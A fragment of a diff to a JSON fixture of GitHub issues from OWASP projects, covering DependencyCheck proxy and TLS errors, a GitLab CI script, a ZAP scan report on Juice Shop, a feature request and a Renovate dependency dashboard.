frames omitted\r\nCaused by: java.io.IOException: Unable to tunnel through proxy. Proxy returns \"HTTP/1.1 407 Proxy Authentication Required\"\r\n at java.base/sun.net.www.protocol.http.HttpURLConnection.doTunneling0(HttpURLConnection.java:2271)\r\n at java.base/sun.net.www.protocol.http.HttpURLConnection.doTunneling(HttpURLConnection.java:2143)\r\n at java.base/sun.net.www.protocol.https.AbstractDelegateHttpsURLConnection.connect(AbstractDelegateHttpsURLConnection.java:185)\r\n at java.base/sun.net.www.protocol.https.HttpsURLConnectionImpl.connect(HttpsURLConnectionImpl.java:141)\r\n at org.owasp.dependencycheck.utils.HttpResourceConnection.obtainConnection(HttpResourceConnection.java:206)\r\n ... 8 common frames omitted\r\n[WARN] Unable to update 1 or more Cached Web DataSource, using local data instead. Results may not include recent vulnerabilities.\r\n[ERROR] Unable to continue dependency-check analysis.\r\n[ERROR] One or more fatal errors occurred\r\n[ERROR] org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; unable to connect.\r\n[ERROR] No documents exist\r\n```\r\n\r\n**To Reproduce**\r\nSteps to reproduce the behavior:\r\n1. Run dependency check with proxy parameters provided through JAVA_TOOLS_OPTIONS \r\n2. Wait for the NVD to finish\r\n4. See error\r\n\r\n**Expected behavior**\r\nThe process should download additional resources without error using the same proxy config.\r\n\r\n**Additional context**\r\nI have successfully downloaded the files manually, so it is not the proxy that blocks these specific URLs\r\n", @@ -129564,7 +129573,7 @@ "comments_count": 24, "closed_at": null, "created_at": "2024-07-04T07:41:38Z", - "updated_at": "2024-09-08T14:27:48Z", + "updated_at": "2024-09-18T19:58:25Z", "author": 2096, "repository": 1345, "assignees": [ @@ -129996,8 +130005,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, 753, + 749, 758 ] } @@ -130028,8 +130037,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, - 754 + 754, + 749 ] } }, @@ -130059,8 +130068,8 @@ "repository": 1345, "assignees": [], "labels": [ - 749, 753, + 749, 758 ] } @@ -130130,23 +130139,23 @@ "pk": 4309, "fields": { "nest_created_at": "2024-09-12T00:36:02.104Z", - "nest_updated_at": "2024-09-12T00:36:02.104Z", + "nest_updated_at": "2024-09-22T19:27:51.500Z", "node_id": "I_kwDOAFZscc6VKzS_", "title": "get TLS Certificate errors while executing dependency-check.bat for my repo", "body": "Hi,\r\nI am facing issue while executing dependency-check.bat for my repo, pls find the error snap below.\r\n\r\n [WARN] An NVD API Key was not provided - it is highly recommended to use an NVD API key as the update can take a VERY long time without an API Key\r\n11:40:18  [WARN] Retrying request /rest/json/cves/2.0?resultsPerPage=2000&startIndex=0 : 2 time\r\n11:40:18  [WARN] Retrying request /rest/json/cves/2.0?resultsPerPage=2000&startIndex=0 : 3 time\r\n11:40:18  [WARN] Retrying request /rest/json/cves/2.0?resultsPerPage=2000&startIndex=0 : 4 time\r\n11:40:18  [WARN] NVD API request failures are occurring; retrying request for the 5 time\r\n11:40:18  [WARN] NVD API request failures are occurring; retrying request for the 6 time\r\n11:40:18  [WARN] NVD API request failures are occurring; retrying request for the 7 time\r\n11:40:18  [WARN] NVD API request failures are occurring; retrying request for the 8 time\r\n11:40:18  [WARN] NVD API request failures are occurring; retrying request for the 9 time\r\n11:40:18  [WARN] NVD API request failures are occurring; retrying request for the 10 time\r\n11:40:18  [WARN] NVD API request failures are occurring; retrying request for the 11 time\r\n11:40:27  [WARN] Retrying request /rest/json/cves/2.0?resultsPerPage=2000&startIndex=0 : 2 time\r\n11:40:27  [WARN] Retrying request /rest/json/cves/2.0?resultsPerPage=2000&startIndex=0 : 3 time\r\n11:40:28  [WARN] Retrying request /rest/json/cves/2.0?resultsPerPage=2000&startIndex=0 : 4 time\r\n11:41:09  ... 7 common frames omitted\r\n11:41:09  Caused by: org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://raw.githubusercontent.com/Retirejs/retire.js/master/repository/jsrepository.json; unable to connect.\r\n11:41:09  at org.owasp.dependencycheck.utils.HttpResourceConnection.obtainConnection(HttpResourceConnection.java:267)\r\n11:41:09  at org.owasp.dependencycheck.utils.HttpResourceConnection.fetch(HttpResourceConnection.java:163)\r\n11:41:09  at org.owasp.dependencycheck.utils.Downloader.fetchFile(Downloader.java:138)\r\n11:41:09  ... 9 common frames omitted\r\n11:41:09  Caused by: javax.net.ssl.SSLHandshakeException: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target\r\n11:41:09  at java.base/sun.security.ssl.Alert.createSSLException(Alert.java:131)\r\n11:41:09  at java.base/sun.security.ssl.TransportContext.fatal(TransportContext.java:378)\r\n11:41:09  at java.base/sun.security.ssl.TransportContext.fatal(TransportContext.java:321)\r\n11:41:09  at java.base/sun.security.ssl.TransportContext.fatal(TransportContext.java:316)\r\n11:41:09  at java.base/sun.security.ssl.CertificateMessage$T13CertificateConsumer.checkServerCerts(CertificateMessage.java:1351)\r\n11:41:09  at java.base/sun.security.ssl.CertificateMessage$T13CertificateConsumer.onConsumeCertificate(CertificateMessage.java:1226)\r\n11:41:09  at java.base/sun.security.ssl.CertificateMessage$T13CertificateConsumer.consume(CertificateMessage.java:1169)\r\n11:41:09  at java.base/sun.security.ssl.SSLHandshake.consume(SSLHandshake.java:396)\r\n11:41:09  at java.base/sun.security.ssl.HandshakeContext.dispatch(HandshakeContext.java:480)\r\n11:41:09  at java.base/sun.security.ssl.HandshakeContext.dispatch(HandshakeContext.java:458)\r\n11:41:09  at java.base/sun.security.ssl.TransportContext.dispatch(TransportContext.java:201)\r\n11:41:09  at java.base/sun.security.ssl.SSLTransport.decode(SSLTransport.java:172)\r\n11:41:09  at java.base/sun.security.ssl.X509TrustManagerImpl.checkTrusted(X509TrustManagerImpl.java:231)\r\n11:41:09  at java.base/sun.security.ssl.X509TrustManagerImpl.checkServerTrusted(X509TrustManagerImpl.java:132)\r\n11:41:09  at java.base/sun.security.ssl.CertificateMessage$T13CertificateConsumer.checkServerCerts(CertificateMessage.java:1335)\r\n11:41:09  ... 23 common frames omitted\r\n11:41:09  Caused by: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target\r\n11:41:09  at java.base/sun.security.provider.certpath.SunCertPathBuilder.build(SunCertPathBuilder.java:148)\r\n11:41:09  at java.base/sun.security.provider.certpath.SunCertPathBuilder.engineBuild(SunCertPathBuilder.java:129)\r\n11:41:09  at java.base/java.security.cert.CertPathBuilder.build(CertPathBuilder.java:297)\r\n11:41:09  at java.base/sun.security.validator.PKIXValidator.doBuild(PKIXValidator.java:434)\r\n11:41:09  ... 28 common frames omitted\r\n11:41:09  [WARN] Unable to update 1 or more Cached Web DataSource, using local data instead. Results may not include recent vulnerabilities.\r\n11:41:09  [ERROR] Unable to continue dependency-check analysis.\r\n11:41:09  [ERROR] One or more fatal errors occurred\r\n11:41:09  [ERROR] org.owasp.dependencycheck.utils.DownloadFailedException: Error downloading file https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; unable to connect.\r\n11:41:09  [ERROR] No documents exist\r\n\r\nCan you pls help me for this same.\r\n\r\nThanks in advance", "summary": "Resolve TLS certificate errors encountered while executing dependency-check.bat by ensuring a valid certification path for the requested targets. Investigate the SSLHandshakeException caused by the inability to establish a connection due to missing certificates in the Java trust store. Provide a valid NVD API key to avoid lengthy update processes and mitigate repeated API request failures.", "hint": "To address the TLS Certificate errors you're encountering while executing `dependency-check.bat`, you can follow these steps:\n\n1. **Update Java**: Ensure that you are using the latest version of Java. TLS handshake issues can arise from using outdated Java versions that do not support newer TLS protocols.\n\n2. **Check Internet Connection**: Verify that you have a stable internet connection. Network issues can lead to connectivity problems when trying to download resources.\n\n3. **Inspect Firewall/Proxy Settings**: If you are behind a firewall or using a proxy, ensure that it allows outbound connections to the required URLs. You may need to configure your proxy settings in Java.\n\n4. **Use NVD API Key**: Although it's a warning, providing an NVD API key can help improve performance and reduce the number of requests made.\n\n5. **Trust the Certificate**: If you are aware of the source and it is safe, you can manually import the server's certificate into the Java keystore. Use the following command:\n ```bash\n keytool -import -alias -file -keystore \n ```\n Make sure to replace placeholders with actual values.\n\n6. **Check for Certificate Updates**: Sometimes, the root certificates in your Java keystore may be outdated. You can update the keystore with the latest certificates from the official source.\n\n7. **Disable SSL Verification (Not Recommended)**: As a last resort and only for testing, you can disable SSL verification in your application. This is not recommended for production environments due to security risks.\n\n8. **Check Dependency-Check Configuration**: Review the configuration settings of the dependency-check tool to ensure that the URLs it attempts to access are correct and reachable.\n\n9. **Run in Debug Mode**: If issues persist, run the `dependency-check.bat` in debug mode to get more verbose output. This can help identify where the issue lies.\n\n10. **Consult Documentation/Community**: If you are still facing issues, refer to the OWASP Dependency-Check documentation or seek help from community forums or GitHub issues related to the tool.\n\nBy following these steps, you should be able to diagnose and potentially resolve the TLS certificate errors you're experiencing.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/jeremylong/DependencyCheck/issues/6944", "number": 6944, "sequence_id": 2502636735, "is_locked": false, "lock_reason": "", "comments_count": 6, - "closed_at": null, + "closed_at": "2024-09-20T14:15:39Z", "created_at": "2024-09-03T11:32:30Z", - "updated_at": "2024-09-04T14:33:37Z", + "updated_at": "2024-09-20T14:15:39Z", "author": 2109, "repository": 1345, "assignees": [], @@ -130248,7 +130257,7 @@ "pk": 4313, "fields": { "nest_created_at": "2024-09-12T00:37:12.646Z", - "nest_updated_at": "2024-09-18T19:03:57.277Z", + "nest_updated_at": "2024-09-22T19:29:28.391Z", "node_id": "MDU6SXNzdWU1NDk4NDYwMTM=", "title": "ERROR: Job failed: exit code 242", "body": "Hello,\r\n I'm using Gitlab CI and i want to add a dependecy-check stage in my pipeline but i got this error all the time, can any one help me with this error ?\r\n\r\n**This the error:**\r\n\r\n`[INFO] Analysis Started\r\n[INFO] Finished Archive Analyzer (3 seconds)\r\n[INFO] Finished File Name Analyzer (0 seconds)\r\n[INFO] Finished Jar Analyzer (0 seconds)\r\n[INFO] Finished Central Analyzer (1 seconds)\r\n[INFO] Finished Dependency Merging Analyzer (0 seconds)\r\n[INFO] Finished Version Filter Analyzer (0 seconds)\r\n[INFO] Finished Hint Analyzer (0 seconds)\r\n[INFO] Created CPE Index (7 seconds)\r\n[WARN] Unable to parse suppression xml file 'dependency_check_suppressions.xml'\r\n[WARN] org.owasp.dependencycheck.xml.suppression.SuppressionParseException: org.xml.sax.SAXException: Line=6, Column=99: cvc-elt.1.a: Cannot find the declaration of element 'xs:schema'.\r\n[ERROR] Exception occurred initializing CPE Analyzer.\r\n[INFO] Finished CPE Analyzer (8 seconds)\r\n[INFO] Finished False Positive Analyzer (0 seconds)\r\n[INFO] Finished NVD CVE Analyzer (0 seconds)\r\n[INFO] Finished RetireJS Analyzer (2 seconds)\r\n[INFO] Finished Sonatype OSS Index Analyzer (0 seconds)\r\n[WARN] Unable to parse suppression xml file 'dependency_check_suppressions.xml'\r\n[WARN] org.owasp.dependencycheck.xml.suppression.SuppressionParseException: org.xml.sax.SAXException: Line=6, Column=99: cvc-elt.1.a: Cannot find the declaration of element 'xs:schema'.\r\n[ERROR] Exception occurred initializing Vulnerability Suppression Analyzer.\r\n[INFO] Finished Vulnerability Suppression Analyzer (0 seconds)\r\n[INFO] Finished Dependency Bundling Analyzer (0 seconds)\r\n[INFO] Analysis Complete (15 seconds)\r\n[ERROR] Warn initializing the suppression analyzer: Failed to load dependency_check_suppressions.xml, caused by org.owasp.dependencycheck.xml.suppression.SuppressionParseException: org.xml.sax.SAXException: Line=6, Column=99: cvc-elt.1.a: Cannot find the declaration of element 'xs:schema'.. \r\n[ERROR] Warn initializing the suppression analyzer: Failed to load dependency_check_suppressions.xml, caused by org.owasp.dependencycheck.xml.suppression.SuppressionParseException: org.xml.sax.SAXException: Line=6, Column=99: cvc-elt.1.a: Cannot find the declaration of element 'xs:schema'.. \r\nUploading artifacts...\r\ndependency-check-out/dependency-check-report.*: found 4 matching files \r\nUploading artifacts to coordinator... ok id=2009442 responseStatus=201 Created token=TunH7rgy\r\nERROR: Job failed: exit code 242`\r\n\r\nAnd this is my script:\r\n\r\n`dependency-check:\r\n stage: pre-analysis\r\n allow_failure: true\r\n image:\r\n name: owasp/dependency-check\r\n entrypoint: [\"\"]\r\n before_script:\r\n - mkdir /usr/share/dependency-check/datas || true\r\n - mkdir -p dependency-check/datas\r\n - mkdir -p dependency-check-out\r\n - PROXY_HOST=$(echo ${http_proxy} | sed -e \"s/[^/]*\\/\\/\\([^@]*@\\)\\?\\([^:/]*\\).*/\\2/\")\r\n - PROXY_PORT=$(echo ${http_proxy} | sed -e 's,^.*:,:,g' -e 's,.*:\\([0-9]*\\).*,\\1,g' -e 's,[^0-9],,g')\r\n script:\r\n - /usr/share/dependency-check/bin/dependency-check.sh\r\n --scan .\r\n --format 'ALL'\r\n --project \"$CI_PROJECT_NAME\"\r\n --failOnCVSS 7\r\n --disableNodeJS\r\n --disableNodeAudit\r\n --suppression=dependency_check_suppressions.xml\r\n --data=dependency-check/datas\r\n --out=dependency-check-out\r\n --proxyserver=${PROXY_HOST}\r\n --proxyport=${PROXY_PORT}\r\n artifacts:\r\n name: \"${CI_JOB_ID}_${CI_JOB_NAME}\"\r\n when: always\r\n expire_in: 1 week\r\n paths:\r\n - dependency-check-out/dependency-check-report.*\r\n cache:\r\n key: dependency-check-data\r\n paths:\r\n - dependency-check/datas\r\n\r\n only:\r\n refs:\r\n - master\r\n except:\r\n variables:\r\n - $DISABLE_DEP_CHECK`\r\n\r\ni'm using the dependency_check_suppressions.xml\r\nLink: [https://github.com/jeremylong/DependencyCheck/blob/master/core/src/main/resources/schema/dependency-suppression.1.1.xsd](url)\r\n\r\nMany thanks !\r\n", @@ -130689,7 +130698,7 @@ "pk": 4328, "fields": { "nest_created_at": "2024-09-12T00:37:39.518Z", - "nest_updated_at": "2024-09-18T19:04:05.698Z", + "nest_updated_at": "2024-09-22T19:29:43.792Z", "node_id": "MDU6SXNzdWU1NTA0NzIxMTQ=", "title": "Removed from Google Play Store", "body": "The app is not available on Google Play Store anymore:\r\nhttps://play.google.com/store/apps/details?id=org.owasp.seraphimdroid", @@ -130738,10 +130747,10 @@ "repository": 1348, "assignees": [], "labels": [ - 767, 768, 769, - 770 + 770, + 767 ] } }, @@ -130812,9 +130821,9 @@ "labels": [ 768, 769, - 771, 772, - 773 + 773, + 771 ] } }, @@ -130857,7 +130866,7 @@ "pk": 4333, "fields": { "nest_created_at": "2024-09-12T00:37:59.056Z", - "nest_updated_at": "2024-09-18T00:19:29.839Z", + "nest_updated_at": "2024-09-22T09:43:56.295Z", "node_id": "I_kwDOAXHG2c6SlQkd", "title": "ZAP Scan Baseline Report", "body": "- Site: [https://cdnjs.cloudflare.com](https://cdnjs.cloudflare.com) \n\n- Site: [https://preview.owasp-juice.shop](https://preview.owasp-juice.shop) \n \t **New Alerts** \n\t- **Missing Anti-clickjacking Header** [10020] total: 12: \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHjM&sid=t7h4xcgImQ1HCSlpAAEH](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHjM&sid=t7h4xcgImQ1HCSlpAAEH) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIfF&sid=6FhwVlMusU3zzBObAAEN](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIfF&sid=6FhwVlMusU3zzBObAAEN) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUJXc&sid=1Z060lCh1GDByPyyAAEQ](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUJXc&sid=1Z060lCh1GDByPyyAAEQ) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUKZ5&sid=Dl_mqBLaermcwwX2AAEX](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUKZ5&sid=Dl_mqBLaermcwwX2AAEX) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zULru&sid=-9VrnjcW4Ng7noATAAEi](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zULru&sid=-9VrnjcW4Ng7noATAAEi) \n\t\t- .. \n\t- **Session ID in URL Rewrite** [3] total: 12: \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHjO&sid=t7h4xcgImQ1HCSlpAAEH](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHjO&sid=t7h4xcgImQ1HCSlpAAEH) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIfJ&sid=6FhwVlMusU3zzBObAAEN](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIfJ&sid=6FhwVlMusU3zzBObAAEN) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUJXd&sid=1Z060lCh1GDByPyyAAEQ](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUJXd&sid=1Z060lCh1GDByPyyAAEQ) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUKZA&sid=Dl_mqBLaermcwwX2AAEX](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUKZA&sid=Dl_mqBLaermcwwX2AAEX) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=websocket&sid=1Z060lCh1GDByPyyAAEQ](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=websocket&sid=1Z060lCh1GDByPyyAAEQ) \n\t\t- .. \n\t- **Private IP Disclosure** [2] total: 1: \n\t\t- [https://preview.owasp-juice.shop/rest/admin/application-configuration](https://preview.owasp-juice.shop/rest/admin/application-configuration) \n\t- **X-Content-Type-Options Header Missing** [10021] total: 12: \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHg3](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHg3) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHjO&sid=t7h4xcgImQ1HCSlpAAEH](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUHjO&sid=t7h4xcgImQ1HCSlpAAEH) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIcC](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIcC) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIfJ&sid=6FhwVlMusU3zzBObAAEN](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUIfJ&sid=6FhwVlMusU3zzBObAAEN) \n\t\t- [https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUJR2](https://preview.owasp-juice.shop/socket.io/?EIO=4&transport=polling&t=P4zUJR2) \n\t\t- .. \n\n \t **Ignored Alerts** \n\t- **Content Security Policy (CSP) Header Not Set** [10038] total: 8: \n\t- **Cross-Domain Misconfiguration** [10098] total: 10: \n\t- **Cross-Domain JavaScript Source File Inclusion** [10017] total: 6: \n\t- **Dangerous JS Functions** [10110] total: 2: \n\t- **Deprecated Feature Policy Header Set** [10063] total: 7: \n\t- **Permissions Policy Header Not Set** [10063] total: 1: \n\t- **Strict-Transport-Security Header Not Set** [10035] total: 11: \n\t- **Timestamp Disclosure - Unix** [10096] total: 10: \n\t- **Base64 Disclosure** [10094] total: 11: \n\t- **Information Disclosure - Suspicious Comments** [10027] total: 2: \n\t- **Modern Web Application** [10109] total: 3: \n\t- **Non-Storable Content** [10049] total: 1: \n\t- **Re-examine Cache-control Directives** [10015] total: 10: \n\t- **Sec-Fetch-Dest Header is Missing** [90005] total: 3: \n\t- **Sec-Fetch-Mode Header is Missing** [90005] total: 3: \n\t- **Sec-Fetch-Site Header is Missing** [90005] total: 3: \n\t- **Sec-Fetch-User Header is Missing** [90005] total: 3: \n\t- **Storable and Cacheable Content** [10049] total: 1: \n\t- **Storable but Non-Cacheable Content** [10049] total: 9: \n\n\n\nView the [following link](https://github.com/juice-shop/juice-shop/actions/runs/10333504769) to download the report.\nRunnerID:10333504769", @@ -130870,16 +130879,14 @@ "sequence_id": 2459240733, "is_locked": false, "lock_reason": "", - "comments_count": 3, + "comments_count": 4, "closed_at": null, "created_at": "2024-08-10T18:09:13Z", - "updated_at": "2024-09-16T02:00:36Z", + "updated_at": "2024-09-22T02:02:49Z", "author": null, "repository": 1348, "assignees": [], - "labels": [ - 774 - ] + "labels": [] } }, { @@ -130910,8 +130917,8 @@ "labels": [ 768, 769, - 775, - 776 + 776, + 775 ] } }, @@ -130920,7 +130927,7 @@ "pk": 4335, "fields": { "nest_created_at": "2024-09-12T00:38:02.502Z", - "nest_updated_at": "2024-09-12T00:38:02.502Z", + "nest_updated_at": "2024-09-22T09:43:56.964Z", "node_id": "I_kwDOAXHG2c6UNg1C", "title": "[🚀] Allow running Juice Shop with Reduced Motion", "body": "\r\n# :rocket: Feature request\r\n\r\n### Description\r\n\r\nThe Juice Shop makes heavy use of animations. Most of the time that is a fun addition to the user experience, but there are some use cases where a reduced motion mode would be preferred e.g.\r\n\r\n- Users with vestibular motion disorders\r\n- Users on low-end machines\r\n- RDP users looking to reduce encoding load\r\n- Personal preference\r\n\r\n### Solution ideas\r\n\r\nI have tried to remove animations manually by importing Angular's [NoopAnimationsModule](https://angular.io/api/platform-browser/animations/NoopAnimationsModule) in _frontend/src/app/app.module.ts_. However I had no success with that. It would be cool if it was possible to set an option in the config file to disable animations application-wide.\r\n\r\n### Possible alternatives\r\n\r\nAlternatively to an option in the config file, the application could check the _prefers-reduced-motion_ CSS media feature, but depending on the operating system this can be hard to configure for the user (e.g. I have no idea how it could be done in Kali) so adding a flag in the Juice Shop config might be nicer.", @@ -130933,16 +130940,17 @@ "sequence_id": 2486570306, "is_locked": false, "lock_reason": "", - "comments_count": 3, + "comments_count": 4, "closed_at": null, "created_at": "2024-08-26T10:54:59Z", - "updated_at": "2024-09-04T03:05:36Z", + "updated_at": "2024-09-19T01:58:27Z", "author": 2126, "repository": 1348, "assignees": [], "labels": [ 768, 772, + 774, 777 ] } @@ -131546,7 +131554,7 @@ "pk": 4356, "fields": { "nest_created_at": "2024-09-12T01:08:13.242Z", - "nest_updated_at": "2024-09-18T19:04:15.780Z", + "nest_updated_at": "2024-09-22T19:31:08.798Z", "node_id": "I_kwDOBAig8M5LTzlH", "title": "Gitbook still shows 1.3.1 release", "body": "Just noticed the Gitbook version still runs with [1.3.1](https://mobile-security.gitbook.io/masvs/) release instead of 1.4.2.", @@ -131776,7 +131784,7 @@ "pk": 4364, "fields": { "nest_created_at": "2024-09-12T01:08:26.196Z", - "nest_updated_at": "2024-09-18T19:04:47.445Z", + "nest_updated_at": "2024-09-22T19:32:21.761Z", "node_id": "I_kwDOAROb6M5lyEFm", "title": "Integrating Code Pulse with Burp Suite.", "body": "Hi @KenProle ,\r\n\r\nGreetings for the day !!\r\n\r\nCan we integrate code pulse with burp suite application ?\r\n\r\nI have tried this many ways for integration but no luck :\r\nPrerequisites: I have uploaded the application's .war file in code pulse. The application is not hosted on my machine, It is hosted on a azure server for which i have a URL.\r\n\r\n1. Using burpsuites BurpSuitePro.vmoptions file by adding the -javaagent parameter, I am able to get the trace connection in code pulse, However I tried navigating the application from that URL and i could not see any movement in code pulse application\r\n2. I tried running Burp Suite pro jar application from this steps https://github.com/codedx/codepulse/wiki/user-guide#java-non-web-applications\r\nbut no luck, I'm getting the trace however there is no movement in code pulse application,\r\n\r\nCould you please suggest any workaround or how i can get this resolved or working ? Appreciate your help in this !!\r\n\r\nThanks !!", @@ -132394,7 +132402,7 @@ "pk": 4386, "fields": { "nest_created_at": "2024-09-12T01:10:17.592Z", - "nest_updated_at": "2024-09-18T19:05:35.985Z", + "nest_updated_at": "2024-09-20T18:25:38.563Z", "node_id": "MDU6SXNzdWU3MTIwNjczNzg=", "title": "Dependency Dashboard", "body": "This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.\n\n## Edited/Blocked\n\nThese updates have been manually edited so Renovate will no longer make changes. To discard all commits and start over, click on a checkbox.\n\n - [ ] [Update Helm release postgresql-ha from 9.4.11 to v14 (helm/defectdojo/Chart.yaml)](../pull/9859)\n\n## Open\n\nThese updates have all been created already. Click a checkbox below to force a retry/rebase of any.\n\n - [ ] [Update redis Docker tag from 7.2.5 to v7.4.0 (docker-compose.yml)](../pull/10651)\n - [ ] [Update Helm release redis from 19.6.4 to v20 (helm/defectdojo/Chart.yaml)](../pull/10736)\n - [ ] [Update actions/download-artifact action from v3 to v4 (.github/workflows/rest-framework-tests.yml)](../pull/10035)\n - [ ] **Click on this checkbox to rebase all open PRs at once**\n\n## Detected dependencies\n\n
docker-compose\n
\n\n
docker-compose.override.dev.yml\n\n - `mailhog/mailhog v1.0.1@sha256:8d76a3d4ffa32a3661311944007a415332c4bb855657f4f6c57996405c009bea`\n - `mccutchen/go-httpbin v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a`\n\n
\n\n
docker-compose.override.https.yml\n\n\n
\n\n
docker-compose.override.integration_tests.yml\n\n - `mailhog/mailhog v1.0.1@sha256:8d76a3d4ffa32a3661311944007a415332c4bb855657f4f6c57996405c009bea`\n\n
\n\n
docker-compose.override.unit_tests.yml\n\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `mccutchen/go-httpbin v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a`\n\n
\n\n
docker-compose.override.unit_tests_cicd.yml\n\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `busybox 1.36.1-musl`\n - `mccutchen/go-httpbin v2.15.0@sha256:24528cf5229d0b70065ac27e6c9e4d96f5452a84a3ce4433e56573c18d96827a`\n\n
\n\n
docker-compose.yml\n\n - `postgres 16.4-alpine@sha256:d898b0b78a2627cb4ee63464a14efc9d296884f1b28c841b0ab7d7c42f1fffdf`\n - `redis 7.2.5-alpine@sha256:6aaf3f5e6bc8a592fbfe2cccf19eb36d27c39d12dab4f4b01556b7449e7b1f44`\n\n
\n\n
\n
\n\n
github-actions\n
\n\n
.github/workflows/build-docker-images-for-testing.yml\n\n - `actions/checkout v4`\n - `docker/setup-buildx-action v3`\n - `docker/build-push-action v6`\n\n
\n\n
.github/workflows/cancel-outdated-workflow-runs.yml\n\n - `styfle/cancel-workflow-action 0.12.1`\n\n
\n\n
.github/workflows/detect-merge-conflicts.yaml\n\n - `eps1lon/actions-label-merge-conflict v3`\n\n
\n\n
.github/workflows/fetch-oas.yml\n\n - `actions/checkout v4`\n\n
\n\n
.github/workflows/gh-pages.yml\n\n - `peaceiris/actions-hugo v3`\n - `actions/setup-node v4`\n - `actions/cache v4`\n - `actions/checkout v4`\n - `actions/checkout v4`\n - `peaceiris/actions-gh-pages v4`\n\n
\n\n
.github/workflows/integration-tests.yml\n\n - `actions/checkout v4`\n - `actions/download-artifact v3`\n\n
\n\n
.github/workflows/k8s-tests.yml\n\n - `actions/checkout v4`\n - `manusa/actions-setup-minikube v2.11.0`\n - `actions/download-artifact v3`\n\n
\n\n
.github/workflows/plantuml.yml\n\n - `actions/checkout v4`\n - `stefanzweifel/git-auto-commit-action v5.0.1`\n\n
\n\n
.github/workflows/pr-labeler.yml\n\n - `actions/labeler v5`\n\n
\n\n
.github/workflows/release-1-create-pr.yml\n\n - `actions/checkout v4`\n - `actions/checkout v4`\n - `stefanzweifel/git-auto-commit-action v5.0.1`\n - `actions/github-script v7`\n\n
\n\n
.github/workflows/release-2-tag-docker-push.yml\n\n - `actions/checkout v4`\n\n
\n\n
.github/workflows/release-3-master-into-dev.yml\n\n - `actions/checkout v4`\n - `actions/checkout v4`\n - `stefanzweifel/git-auto-commit-action v5.0.1`\n - `actions/github-script v7`\n - `actions/checkout v4`\n - `actions/checkout v4`\n - `stefanzweifel/git-auto-commit-action v5.0.1`\n - `actions/github-script v7`\n\n
\n\n
.github/workflows/release-drafter.yml\n\n - `release-drafter/release-drafter v6.0.0`\n - `actions/download-artifact v3`\n - `actions/upload-release-asset v1`\n - `actions/upload-release-asset v1`\n\n
\n\n
.github/workflows/release-x-manual-docker-containers.yml\n\n - `docker/login-action v3`\n - `actions/checkout v4`\n - `docker/setup-buildx-action v3`\n - `actions/cache v4`\n - `docker/build-push-action v6`\n - `docker/build-push-action v6`\n\n
\n\n
.github/workflows/release-x-manual-helm-chart.yml\n\n - `actions/checkout v4`\n - `azure/setup-helm v4`\n - `softprops/action-gh-release v2`\n\n
\n\n
.github/workflows/release_drafter_valentijn.yml\n\n\n
\n\n
.github/workflows/rest-framework-tests.yml\n\n - `actions/checkout v4`\n - `actions/download-artifact v3`\n\n
\n\n
.github/workflows/ruff.yml\n\n - `actions/checkout v4`\n\n
\n\n
.github/workflows/shellcheck.yml\n\n - `actions/checkout v4`\n\n
\n\n
.github/workflows/submodule-update.yml\n\n - `actions/github-script v7`\n\n
\n\n
